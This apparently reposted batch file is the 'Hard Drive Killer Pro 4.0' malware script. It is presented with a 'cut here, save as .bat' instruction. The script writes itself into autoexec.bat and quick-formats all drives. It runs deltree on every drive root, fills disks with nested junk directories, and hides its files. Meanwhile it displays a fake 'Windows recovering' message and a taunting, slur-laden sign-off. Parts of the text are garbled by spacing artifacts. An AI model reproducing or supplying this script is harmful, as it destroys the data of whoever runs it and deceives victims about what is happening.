Echo for %%%% a in (% drive%) Do Call Format %%%% A: / Q / U / Autosample> NUL >> C: /autoexec.bat

Echo CLS >> C: /autoexec.bat

Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat

Echo for %%%% a in (% drive%) Do Call C: /Temp.bat %%%% a bunga> NUL >> C: /autoexec.bat

Echo CLS >> C: /autoexec.bat

Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat

Echo for %%%% a in (% drive%) Call deltree / y %%%% A: /> NUL >> C: / / /AUTOEXEC.BAT

Echo CD / >> C: /autoexec.bat

Echo CLS >> C: /autoexec.bat

Echo echo welcome to the land of death. Munga bunga's multiple hard drive killer version 4.0. >> c: /autoexec.bat

Echo echo if you ran this file, the made it. The purpose of this program is to tell you the following.. >> C: /autoexec.bat

Echo echo 1. To make people aware trurity shouth c: /autoexec.bat

Echo Echo 2. Love Is Important, IF you have it, truly, don't let Go of It Like i DID! >> C: /autoexec.bat

Echo Echo 3. if you are not a vegetarian, the you are a murder, and i'm glad your hd is dead. >> c: /autoexec.bat

Echo Echo 4. Don't Support The Following: War, Racism, Drugs and The LibERAL Party. >> C: /autoexec.bat

Echo echo. >> C: /autoexec.bat

echo echo regards, >> c: /autoexec.bat

Echo echo. >> C: /autoexec.bat

Echo Echo Munga Bunga >> C: /autoexec.bat

Call Attrib R H C: /autoexec.bat

: Makedir

If EXIST C: /TEMP.BAT Attrib -R -H C: /TEMP.BAT> Nulecho @echo off> c: /Temp.bat

Echo %% 1: / >> C: /TEMP.BAT

Echo CD / >> C: /TEMP.BAT

Echo: startmd >> C: /TEMP.BAT

Echo for %%%% a in ("if not exist %% 2 / NUL MD %% 2" "if exist %% 2 / NUL CD %% 2") DO %%%% A >> C: / TEMP. bat

Echo for %%%% a in ("> ass_hole.txt") DO Echo %%%% a Your Gone @ $$ Hole !!!! >> C: /Temp.bat

Echo if not exist %% 1: / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 /% % 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 /% % 2 / %% 2 / %% 2 / NUL GOTO STARTMD >> C: /TEMP.BAT

Call Attrib R H C: /Temp.bat> NUL

CLS

..

Rem deltree / y %% A: / *. Only Eliminates Directories, Hence Leaving The File Created Above for Further Destruction.

For %% a in (% drive%) Do Call Format %% A: / Q / U / AutoSample> NUL

CLS

..

..

For %% a in (% drive%) Do Call C: /Temp.bat %% a Munga> NUL

CLS

..

..

..

For %% a in (% drive%) Call attrib -r -h %% A: / / / / / / s> NUL

Call Attrib R H C: /Temp.bat> NUL

Call Attrib R H C: /autoexec.bat> NUL

CLS

..

..

..

..

For %% a in (% drive%) Call deltree / y %% a: / *.> NUL

CLS

..

..

..

..

..

For %% a in (% drive%) Do Call C: /Temp.bat %% a Munga> NUL

CLS

YOUNGA PRODUCT.ECHO.

Echo Oh and Bill Gates Rules, And He Is Not a Geek, He is A Good Looking Genius.

echo.

..

echo.

Echo Q). What's the WORST Thing About Being An Egg?

Echo a). You Only get laid.

echo.

Echo Hahahaha, Get it? don't you just love what one?

echo.

Echo regards,

echo.

Echo Munga Bunga

: END: END

Rem Hard Drive Killer Pro Version 4.0, Enjoy !!!!

Rem Author: Munga Bunga - From Australia, The Land Full of Retarded Australian'S (Help Me Get Out of Here).

------------------------ Cut Here the Save as .bat or .cmd file --------------- ----------------

转载请注明原文地址:https://www.9cbs.com/read-129524.html

New Post(0)